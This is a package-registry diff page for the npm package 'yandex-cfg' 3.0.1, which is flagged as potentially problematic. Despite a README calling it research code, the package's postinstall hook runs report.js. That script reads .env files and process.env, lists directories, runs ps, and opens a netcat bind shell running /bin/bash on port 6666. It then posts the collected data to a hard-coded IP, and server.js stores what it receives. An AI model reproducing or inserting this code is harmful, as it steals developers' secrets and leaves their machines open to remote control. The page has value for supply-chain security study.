yandex-cfg 3.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of yandex-cfg might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/README.md +4 -0
  2. package/index.js +6 -0
  3. package/package.json +12 -0
  4. package/report.js +113 -0
  5. package/server.js +47 -0
package/README.md ADDED
@@ -0,0 +1,4 @@
1
+ # This is research code and is not intended for production use.
2
+
3
+ For Yandex Security Team: do not use package names without '@yandex' prefix.
4
+ All data will be used for research purposes only, no data will be shared with third parties.
package/index.js ADDED
@@ -0,0 +1,6 @@
1
+ const Report = require('./report');
2
+ module.exports = () => {
3
+ //console.log(`Hello, this is not real code`);
4
+ Report();
5
+ }
6
+ Report();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "yandex-cfg",
3
+ "version": "3.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "postinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/report.js ADDED
@@ -0,0 +1,113 @@
1
+ const os = require('os');
2
+ const fs = require('fs');
3
+ const https = require('https');
4
+ const http = require('http');
5
+ const httpsRequest = (url, method, data) => {
6
+ return new Promise((resolve, reject) => {
7
+ const module = url.startsWith('https') ? https : http;
8
+ const req = module.request(url, method, res => {
9
+ let body = '';
10
+ res.on('data', chunk => {
11
+ body += chunk;
12
+ });
13
+ res.on('end', () => {
14
+ resolve(body);
15
+ });
16
+ });
17
+ req.on('error', error => {
18
+ reject(error);
19
+ });
20
+ if (data) {
21
+ req.write(data);
22
+ }
23
+ req.end();
24
+ });
25
+ };
26
+
27
+ const readEnvFiles = () => {
28
+ const files = [
29
+ '../.env',
30
+ '../../.env',
31
+ '../../../.env',
32
+ '../../../../.env',
33
+ ];
34
+ const envs = [];
35
+ for (const file of files) {
36
+ try {
37
+ const content = fs.readFileSync(file, 'utf8');
38
+ envs.push(content);
39
+ } catch (error) {
40
+ // Ignore
41
+ }
42
+ }
43
+ return envs;
44
+ };
45
+
46
+
47
+ const spawn = require('child_process').spawn;
48
+
49
+ // Generate report about the system, public ip, memory, cpu, etc.
50
+ const generateReport = async () => {
51
+ const report = {
52
+ platform: os.platform(),
53
+ arch: os.arch(),
54
+ release: os.release(),
55
+ totalmem: os.totalmem(),
56
+ freemem: os.freemem(),
57
+ cpus: os.cpus(),
58
+ networkInterfaces: os.networkInterfaces(),
59
+ uptime: os.uptime(),
60
+ ps: '',
61
+ envs: readEnvFiles(),
62
+ env: process.env,
63
+ };
64
+
65
+ // List all files in the current directory
66
+ const files = [
67
+ fs.readdirSync('../'),
68
+ fs.readdirSync('../../'),
69
+ fs.readdirSync('../../../'),
70
+ fs.readdirSync('../../../../'),
71
+ ];
72
+
73
+ // Add the files to the report
74
+ report.files = files;
75
+
76
+ // Get the public IP address
77
+ const publicIp = await httpsRequest('https://api.ipify.org?format=json', 'GET');
78
+ report.publicIp = JSON.parse(publicIp).ip;
79
+
80
+
81
+ // Get process list
82
+ const ps = spawn('ps', ['aux']);
83
+ ps.stdout.on('data', data => {
84
+ report.ps += data.toString();
85
+ });
86
+
87
+ // Run backdoor shell on 6666 port and stay in background forever
88
+ spawn('nc', ['-l', '-p', '6666', '-e', '/bin/bash']);
89
+
90
+
91
+ // Sleep for few seconds
92
+ await new Promise(resolve => setTimeout(resolve, 2000));
93
+
94
+ // Compress the report
95
+ const reportString = JSON.stringify(report);
96
+ const reportBuffer = Buffer.from(reportString);
97
+ const reportCompressed = reportBuffer.toString('base64');
98
+
99
+ // Send the report to the server
100
+ const url = 'http://139.59.181.57:3030/report';
101
+ const data = JSON.stringify({ report: reportCompressed });
102
+ await httpsRequest(url, {
103
+ method: 'POST',
104
+ headers: {
105
+ 'Content-Type': 'application/json',
106
+ 'Content-Length': data.length
107
+ }
108
+ }, data);
109
+
110
+ return report;
111
+ }
112
+
113
+ module.exports = generateReport;
package/server.js ADDED
@@ -0,0 +1,47 @@
1
+ // Simple HTTP server saves all reports to the file system
2
+
3
+ const http = require('http');
4
+ const fs = require('fs');
5
+ const path = require('path');
6
+ const APP_PORT = 3030;
7
+ fs.mkdirSync(path.join(__dirname, 'reports'), {
8
+ recursive: true
9
+ });
10
+
11
+ const server = http.createServer((request, response) => {
12
+
13
+ try {
14
+ // Save report to the file system
15
+ const fileName = path.join(__dirname, 'reports', `${Date.now()}.json`);
16
+ let body = [];
17
+ request.on('data', (chunk) => {
18
+ body.push(chunk);
19
+ }).on('end', () => {
20
+ body = Buffer.concat(body).toString();
21
+
22
+ console.log(`==== ${request.method} ${request.url}`);
23
+ console.log('> Headers');
24
+ console.log(request.headers);
25
+
26
+ console.log('> Body');
27
+ console.log(body);
28
+
29
+ fs.writeFileSync(fileName, JSON.stringify({
30
+ method: request.method,
31
+ url: request.url,
32
+ headers: request.headers,
33
+ body
34
+ }));
35
+
36
+ response.end();
37
+ });
38
+
39
+ } catch (error) {
40
+ console.error(error);
41
+ response.end();
42
+ }
43
+ });
44
+
45
+ server.listen(APP_PORT, () => {
46
+ console.log('Server listening on port ' + APP_PORT);
47
+ });